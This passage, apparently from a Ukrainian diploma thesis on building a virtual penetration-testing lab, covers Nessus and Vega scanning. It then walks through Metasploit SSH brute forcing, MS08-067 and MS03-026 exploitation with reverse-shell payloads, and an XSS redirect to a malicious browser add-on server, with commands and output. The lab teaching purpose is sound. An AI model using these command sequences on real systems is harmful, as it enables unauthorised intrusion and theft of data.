Створення гнучкої системи тестування веб-серверів для їх захисту від несанкціонованого доступу

· Наявність вразливих версій служб або доменів

· Помилки в конфігурації (наприклад, відсутність необхідності авторизації на SMTP-сервері)

· Наявність паролів за замовчуванням, порожніх, або слабких паролів

Програма має клієнт-серверну архітектуру, що сильно розширює можливості сканування. Відповідно до проведеного порталом securitylab.ru опитуванням, nessus використовують 17% респондентів

3.7 Плагіни

Відмінна риса Nessus - розумні плагіни. Сканер ніколи не буде сканувати сервіс тільки за номером його порту. Перемістивши веб-сервер зі стандартного 80-го порту, скажімо, на 1234-й, обдурити Nessus не вдасться - він це визначить. Якщо на FTP-сервері відключений анонімний користувач, а частина плагінів використовують його для перевірки, то сканер не буде їх запускати, усвідомивши, що результату від них не буде. Якщо плагін експлуатує уразливість в Postfix, Nessus не буде пробувати тести проти Sendmail - і т.д. Зрозуміло, що для виконання перевірок на локальній системі, необхідно надати сканеру Credentials (логіни і паролі для доступу) - це завершальна частина налаштування правил.

3.8 Установка програми

dpkg -i Nessus-5.2.5-debian6_i386.deb

після чого активуємо службу Nessus

/etc/init.d/nessusd start

3.9 Використання

Насамперед використовується для сканування портів і визначає сервіси, що використовують їх. Також проводиться перевірка сервісів по базі вразливостей. Для тестування вразливостей використовуються спеціальні плагіни, написані мовою NASL (Nessus Attack Scripting Language).

База вразливостей оновлюється щотижня, однак для комерційних передплатників є можливість завантажувати нові плагіни без семиденної затримки.

При відключеній опції «safe checks» деякі тести на уразливості, використовувані Nessus можуть привести до порушень в роботі сканованих систем.

Управління сканером здійснюється через веб-інтерфейс. Щоб туди потрапити, введіть в адресному рядку браузера https://127.0.0.1:8834. Тут буде потрібно створити аккаунт адміністратора, вказавши логін і пароль. На наступному кроці необхідно ввести код активації, який прийде на вашу електронну пошту, вказану на сайті виробника при реєстрації. Завершальною стадією установки є завантаження плагінів.

Для збереження результатів сканування в базі даних Метасплойта, необхідно до неї підключитися

db_connect <user:pass>@<host:port>/<database>

Тепер нам потрібно довантажити плагін nessus: load nessus

Рис. 32. Nessus і Metasploit.

і підключитися до сервера Nessus

nessus_connect username:password@hostname:port

На жаль, управління через консоль Метасплойта не дозволяє скористатися всіма можливостями Nessus. Так, наприклад, для створення завдання сканування необхідна наявність політики сканування (параметрів для проведення певного типу сканування), яку можна створити тільки через веб-інтерфейс Нессуса. У зв'язку з цим буде розглянута як робота з консоллю, так і робота з веб-інтерфейсом.

3.10 Робота з веб-інтерфейсом

Перш за все, потрібно створити політики це правила, за якими буде здійснено сканування. Таких політик в програмі є декілька. Деякі з них не доступні з безплатної версії. Проте, загальновживані присутні.

Найбільш вагомою є Політика тестування веб-додатків.

Рис. 33. Політики.

Вона має можливість сканування веб-додатків на різній «глибині».

Рис. 34. «Глибина» пошуку.

Після створення необхідних політик, можна створювати нове сканування.



Рис. 35. Нове сканування.

Є можливість сканування одразу декількох серверів, комп'ютерів, тощо.

Залежно від обраної політики та кількості адресів, сканування може зайняти чимало часу.

Тут на допомогу стає створення графіку сканування.

Завершене сканування має наступний вигляд

Більш детальний перегляд

Відмінною особливістю сканера є рекомендації по усуненню вразливостей

Завершальним етапом є імпорт збережених результатів сканування в базу даних Metasploit

db_import `/root/Desktop/nessus_report_PentestIT_Веб.nessus



Рис. 36. Результат сканування.

Рис. 37. Імпорт.



Рис. 38. Більш детальний результат сканування.

Рис. 39. Рекомендації.

'

3.11 VEGA

В порівнянні з попереднім, даний сканер програє у інтерактивності. Його не можна покласти на віддалене сканування через певні проміжки часу. Але у порівнянні з більшістю, сканер виграє. Деякою перевагою над Nessus є те, що його не потрібно встановлювати як окремий сервер, а функціоналу він не сильно посувається. Це виражається у більш детальній побудові структурі сайту, а також більш жорсткій політиці тестування. Ключовою особливість є вивід рекомендацій по усуненню вразливостей.

Рис. 40. Vega.

3.12 Тестування надійності засобів віддаленого управління

Перш за все, доцільно протестувати головний метод віддаленого управління, а саме ssh. Ssh шифрується за допомогою алгоритму шифрування rsa, тому про злам самого алгоритму мова не йде. Проте, як і будь-який інший, даний алгоритм вразливий до «брутфорс»-атаки. Наявність слабкого ключа - гарант успішної атаки на ssh.

Для практичної демонстрації злому, використано засоби програми Metasploit.

ssh_version

Дізнатись коректну версію ssh, що встановлено на сервері потрібно, щоб збільшити шанс успіху.

Щоб викликати цей допоміжний модуль використано наступну команду:

Use auxiliary/scanner/ssh/ssh_version

Достатньо вказати цільовий діапазон адрес в "Rhosts". "Rhosts" може бути унікальним IP-адресом, IP-адресом в діапазоні (наприклад: 192.168.1.0-192.168.1.255 або 192.168.1.0/24) або файлом (наприклад: /tmp/ip_addresses.txt).

Рис. 41. Версія ssh.

ssh_login

Після отримання версії ssh, що працює на стороні сервера, функціонал зловмисника зростає. Для прикладу, можна скористатись модулем ssh_login. Відмінною рисою модуля є одночасний перебір по логіну та паролю. Звісно це сильно збільшує час перебору, проте, якщо відомо імена кількох користувачів - час перебору зменшиться.

Щоб викликати цей допоміжний модуль просто введіть наступну команду: Use auxiliary/scanner/ssh/ssh_login

Цей модуль намагається перевірити відповідність за допомогою SSH на сервері з використанням імені користувача та пароля, зазначені в "USER_FILE", "PASS_FILE" і "USERPASS_FILE". В Metasploit забезпечено файли для "USER_FILE" (/opt/metasploit3/msf3/data/wordlists/unix_users.txt) і "PASS_FILE" (/opt/metasploit3/msf3/data/wordlists/unix_passwords.txt). Також можна використовувати SkullSecurity список паролів, або свій власний список.

Кожен успішний злом автоматично створить нову сесію.

Рис. 42. Опції.

Допустимі спроби входу відображаються зеленим кольором, невдалі забарвлено в червоний.

Рис. 43. Процес перебору.

Рис. 44. Створення активної сесії.

3.13 Тестування надійності ОС, що встановлені у віртуальному тестовому середовищі

Додатковою особливістю віртуальної тестової лабораторії є її універсальність. Тестування може здійснюватися не тільки щодо веб-серверів, чи поштових-серверів, ігрових, ftp і т.п. Система дозволяє тестувати на проникнення будь-який пристрій, що має вихід в Інтернет. Хорошим прикладом універсальності лабораторії є тестування на проникнення різних операційних система персонального використання, як наприклад Windows.

3.14 Metasploit

Створений компанією Rapid7 у 2003 році. Поставляється для Linux та Windows. Що цікаво, так це ліцензія на програму - BSD, тобто безплатна з можливістю додання змін у вихідний код програми. Саме BSD дала великий поштовх у розвиток Metasploit, тому база програми розширюється з кожним роком сотнями ентузіастів у сфері ІБ, як зловмисниками так і спеціалістами.

Metasploit насамперед модульна, експлойти та "начинки" до них можна як скачати окремо, по мірі їх необхідності, або створити самому.

Експлойти - це програми, які використовують вразливості системи. Для кожної вразливості потрібен свій експлойт.

"Начинка" (payload) - вектор, в якому буде здійснено злом. Іншими словами, тоді як експлойт це використання вразливості, то "начинка" - вказує як саме використати вразливість.

• сканування жертви на предмет відкритих портів

• пошук експлойтів відповідно до знайдених вразливостей

• застосування експлойтів, "начинок"

• доступ до командного рядка жертви

Перед початком потрібно провірити, що кожна з машин бачить одна одну.

Зробити це можна командою "ping х.х.х.х" (де х.х.х.х відповідний IP адрес).

Для визначення ip-адреса в windows команда "ipconfig" (команди вводяться в командний рядок cmd.exe). Відповідно в Ubuntu команда "ifconfig" (вводиться в терміналі).

На домашній системі (хостовій) встановлено програму nmap.

Nmap - це сканер вразливостей та відкритих портів. За його допомогою можна дізнатись про вразливості майже будь-якого комп'ютера, якщо той знаходиться в мережі інтернет та має зовнішній IP-адрес. Його особливістю є те, що в 80% жертва не буде знати що її було проскановано.

Nmap - кроссплатформений, а також безплатний, його особливістю є його дуже широкий функціонал, висока швидкість роботи, а також компактний розмір (як пакету інсталяції так і в оперативній пам'яті при його роботі).

Сканування здійснювалось з хостової машини, командою nmap з параметром -А, що дало більш агресивне та повне сканування.

Загалом команда nmap -A 192.168.0.102 дала такий результат:

Рис. 45. Результат сканування за допомогою Nmap.

135/tcp open msrpc Microsoft Windows RPC ; 139/tcp open netbios-ssn ; 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds ; 2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP) - це порти, найбільш потрібними є 135 та 445.

Конкретно порти 135 та 445 є системними, через які можна завдяки певним маніпуляціям, повисити собі права, до системних. І саме ці порти відкриті про що свідчить параметр open.

Крім того вдалось просканувати та дізнатись тип операційної системи, унікальну MAC-адресу комп'ютера, робочу групу, ім'я комп'ютера та навіть годину. Це далеко не всі можливості Nmap, але в контексті даної роботи не вистачать перерахувати всіх можливостей цього сканера.

Відкриті порти свідчать про те, що на системі-жертві відключений Брандмауер, основна задача якого саме фільтрувати трафік, закриваючи відповідні порти. Також з цією задачею може справитись антивірус.

Після успішного сканування, командою msfupdate оновлено базу даних Metasploit на BackTrack, для пошуку можливих експлойтів, які б підійшли до цих портів. Оновити базу виявилось легко, адже все відбувалось в автоматичному режимі.

Запуск Metasloit через команду msfconsole, тобто в консольному режимі. Графічний інтерфейс у Metasloit є, але через недостатню потужність комп'ютера (три операційні системи працюють паралельно одна одній одночасно), вирішено скористатись консоллю.

Після запуску msfconsole, комп'ютер складав базу. Показником нормальної роботи програми є вивід "msf >" - тобто відтепер звернення відбувається не від свого імені, а від імені програми.

Знайшовши в інтернеті, що для цих портів найкраще застосовувати експлойти з netapi.

"search netapi" - пошук по базі всіх експлойтів дав декілька результатів, серед який був один з тегом "great", що означає велику ймовірність успіху.

Наступним кроком було підключення цього експлойта командою

"use exploit/windows/smb/ms08_067_netapi".

"show options" переконався, що хоча б один з відкритих портів підтримується.

Встановив RHOST, тобто вказав адрес жертви,

"set RHOST 192.168.0.102"

"set PAYLOAD windows/shell/reverse_tcp" - задав "начинку".

Тут доступна велика кількість варіантів, але обрано shell, для доступу до "оболонки" Windows. Як варіант можна було використати

"set payload windows/meterpreter/reverse_tcp"

"set LHOST 192.168.0.100" - закріплення, тобто вказано звідки буде здійснено атаку, та де "висітиме" експлойт.

"exploit" - запустити процес злому. Після чого все відбувається в автоматичному режимі, і залишається лише чекати та надіятись на успіх.

При першій спробі, доступ отримати не вдалось, натомість було отримано ще більше даних про жертву.

§ [*] Started reverse handler on 192.168.0.100:4444

§ [*] Automatically detecting the target...

§ [*] Fingerprint: Windows XP - Service Pack 3 - lang:Russian

§ [*] Selected Target: Windows XP SP3 Russian (NX)

§ [*] Attempting to trigger the vulnerability...

Дізнавшись, яка мова стоїть на комп'ютері, можна дещо збільшити шанси на успіх.

"show targets" - список можливих жертв, знайшовши у списку XP3 з російською мовою, задав цей параметр

"set target 60" (60 номер за списком)

Підтвердженням, того що процедура злому успішна, була зміна msf> на C:/(імя користувача)

Рис. 46. Успішний злом.

Потрапивши у систему, зловмисник вільний робити все. При бажані можна було б навіть форматувати жорсткий диск.

Найчастіший розвиток подій в такій ситуації, внесення змін у реєстр Windows, для подальшого "тихого" встановлення програми, типу Radmin, VNC, для віддаленого керування комп'ютером, використовуючи графічний інтерфейс, або становлення невидимих кейлоггерів для крадіжки паролів. Варіантів багато.

Оскільки кількість експлойтів є дуже великою, весь процес можна здійснити по іншому: все залежить від того, які саме цілі переслідуються. Для прикладу можна було скористатись наступними командами

§ search dcom

§ use exploit/windows/dcerpc/ms03_026_dcom

§ set RHOST

§ PAYLOAD generic/shell_reverse_tcp

§ set LHOST

Тобто в разі неможливості здійснення проникнення в систему одним методом, можна використати інший, комбінуючи різні експлойти та «начинки».

Єдиним дієвим методом протидії є ввімнення фаєрволу, встановлення антивірусу, оновлення ПЗ. Справа в тім, що фаєрвол закриває ті порти, як не виготовується. Деякі антивіруси також мають таку можливість. Також антивіруси не дозволять відбуватись підозрілій активності без відома користувача. Оновлення ПЗ природнім чином усуває вразливість, оскільки вона викликана невірним написанням коду програми (ОС), що при оновленні виправляється розколинками.

3.15 Використання вразливості XSS

Всі попередні сканери вразливостей виявили небезпечну вразливість XSS (XST). Експлуатація її дозволяє отримати повний доступ саме до користувача, який мав нещастя зайти на сайт, з цією вразливістю.

Суть заключається в тому, що при написанні повідомлення (наприклад на форумі), це повідомлення ніяк не ігнорується системою. Таким чином можна написати код, який виконаєтеся. Для перевірки вразливості, введем наступне:

<script>alert(“NO”)</script>

Рис. 47. Перевірка вразливості.

Рис. 48. Вразливість присутня.

При отриманні результату як на Рис. 49. можна переходити до наступного кроку. А саме - написання переадресації користувача з даного серверна, на інший, який спеціально конфігурований, щоб «зламати» користувача.

Для того, щоб не писати такий спеціально конфігурований сайт самому, можна скористатись засобами Metasploit. В BackTrack вводимо msfconsole та очікуємо на привітання програми.

use firefox_xpi_bootstrtapped_addon

set LSHOT 194.168.0.102

exploit

Рис. 49. Експлойт «Розширення для браузера».

Таким чином, отримали очікуваний веб-сервер, за адресою 192.168.0.102:7070/C6p8Hq5wPip

Повертаємось до вразливого сайту.

На місті alert вводимо наступне

<script>window.location = “192.168.0.102:7070/C6p8Hq5wPip”</script>

Оскільки форма відправки не дозволяє відправити більше, аніж 50 символів, потрібно у випадаючому меню, обрати «Дослідити елемент» та змінити значення.

Рис. 50. Переадресація користувача.

Тепер залишається лишень чекати, коли хтось перейде на сайт.

Після переходу, користувачеві буде пропоновано скачати розширення до браузера. Тут йде в хід соціальної інженерія.

sessions -l

Виведе всі активні сесії, тобто користувачів, які перейшли за посиланням.

Перевіряєм чи справді все вдалось. Навмання вводимо команду. Dir - на ОС Windows виведе список папок.



Рис. 51. Активні сесії.

Рис. 52. Успішне проникнення.

Висновок до розділу 3

В даному розділі розлянуто виявлення вразливостей. Насамперед це здійснюється за допомогою засобів ОС BackTrack. В даній ОС попередньо встановлена велика кількість потрібних сканерів.

Сканери вразливостей надсилають на досліджуваний сервер велику кількість даних, та аналізуються відповіді. Деякі сканери (Nesuss, VEGA) працюють більш жорстко, тобто їхнє сканування передбачає проникнення в систему. Тому їх використання повинне бути обдуманим, на не бути направленим на об'єкти, що не належать до досліджуваної групи. В противному разі сканування можна вважати спробою злому системи, та потягне за собою відповідну відповідальність.

Також в даному розділі розглянуто методи використання виявлених вразливостей. Це робиться для того, щоб перевірити, чи справді дана вразливість є небезпечною, а також, щоб зрозуміти дії зловмисника, та ефективно їх заблокувати. Такий підхід дозволить реально зрозуміти, як вразливість себе проявляє, та що є її першопричиною.

Потрібно пам'ятати, що сканування відбувається відповідно до попередньо створених баз. Це означає, що виявлені вразливості є виявленими тільки тому, що вони є відомими. Вразливості «нульового дня» - ще не виявлені, або недоступні широкому загалу, проте можуть бути використані зловмисниками. Захист від них можливий лише при детальному їх аналізі.

Висновок

Метаю даної дипломної роботи було створення віртуальної тестової лабораторії. На практиці, було використано наступні засоби:

· Один ноутбук, фірми EMachines

o Процесор: Intel Core i3-370M

o Оперативна пам'ять: 4 Gb DDR3

o ОС - Kubuntu 13.10 64bit

· Віртуальні машини запущені з VirtualBox 4.3:

o ОС для здійснення атак -BackTrack 5 R3 64Bit

o ОС для тестування на вразливість - Windows XP SP2 32Bit

o ОС для тестування веб-сервера - FreeBSD 10.1 64Bit

Тестування відбувалось, зокрема, на основні вразливості системи. Такі вразливості вдалось знайти завдяки сканерам вразливостей Nessus, Nikto, Uniscan.

В даній роботі акцент зроблено на створенні робочої віртуальної лабораторії. Також наведено кілька прикладів виявлення вразливостей, та практична демонстрація використання цих вразливостей для отримання несанкціонованого доступу до інформації, що зберігається на віддалених машинах. Дані приклади спричинені досліджуваною системою - веб-сервером, що функціонує на ОС FreeBSD. Тобто кількість тестів є необмеженою, та залежить від конкретної ситуації. Також, як продемонстровано в роботі, є можливість тестування користувацьких ОС.

Проект даної віртуальної тестової лабораторії дозволить тестувати різного роду ПЗ, а також цілі ОС на предмет наявності в них вразливих місць. Сама лабораторія являє собою комплекс програмно-віртуалізованих ОС, одна частина яких складає об'єкти тестування, інша - суб'єкти. Заміна цих засобів не вимагає великих зусиль, адже лабораторія є модульним рішенням. Таким чином, можливо швидко змінювати вектор тестування, та акцентувати увагу на потрібних тестах.

Додатково, віртуальна тестова лабораторія здатна тестувати не тільки віртуальні машини, але й реальні. Таким чином можна аналізувати ситуацію, виявляти недоліки та усувати їх, не виводячи праюючі системи з роботи.

Проект віртуальної тестової лабораторії можна розприділити між декількома комп'ютерами, таким чином збільшуючи обчислювальні потужності. Для прикладу можна тестувати надійність паролів, методом їх перебору на декількох машинах, що зменшить час тесту. Таким самим чином можна проводити тести на відміну в обслуговуванні, звертаючись з багатьох комп'ютерів, до одного сервера.

Список використаних джерел

1. Linux. Администрирование и системное программирование. 2-е изд. - Собель М - Google Книги

2. Установка и Допиливание BackTrack 5

3. Как запустить backtrack 5

4. TP-LINK Форум * Просмотр темы - Проброс портов\Port Forwarding

5. Как настроить резервирование адресов на DHCP-сервере (чипсет Broadcom) - Добро пожаловать в TP-LINK

6. Kali Linux -- Википедия

7. Установка Windows XP в виртуальную машину VirtualBox

8. Виртуальная машина VirtualBox | Русскоязычная документация по Ubuntu

9. Сравнение виртуальных машин -- Википедия

10. VirtualBox -- Википедия

11. VirtualBox

12. [HOWTO] Install LinuxOnAndroid distros on yo… | Android Development and Hacking | XDA Forums

13. LAMP | Русскоязычная документация по Ubuntu

14. LAMP (apache mysql php) | Русскоязычная документация по Ubuntu

15. Scanner SSH Auxiliary Modules - Metasploit Unleashed

16. Enable SSH server on Backtrack 5 r2 | Hezik.nl

17. Utilizing Metasploit as a Login Scanner and as a Brute force Attack Tool | Penetration Testing Laboratory | Online Training Courses - Learn Penetration Testing in Practice

18. Eric Romang Blog » Metasploit SSH Auxiliary Modules

19. VNC Personal Edition 4.5. Лицензия! Купить VNC Personal Edition 4.5 в SoftKey

20. VNC, RDP и прочие прелести удаленных десктопов GNU/Linux в Новосибирске

Размещено на Allbest.ru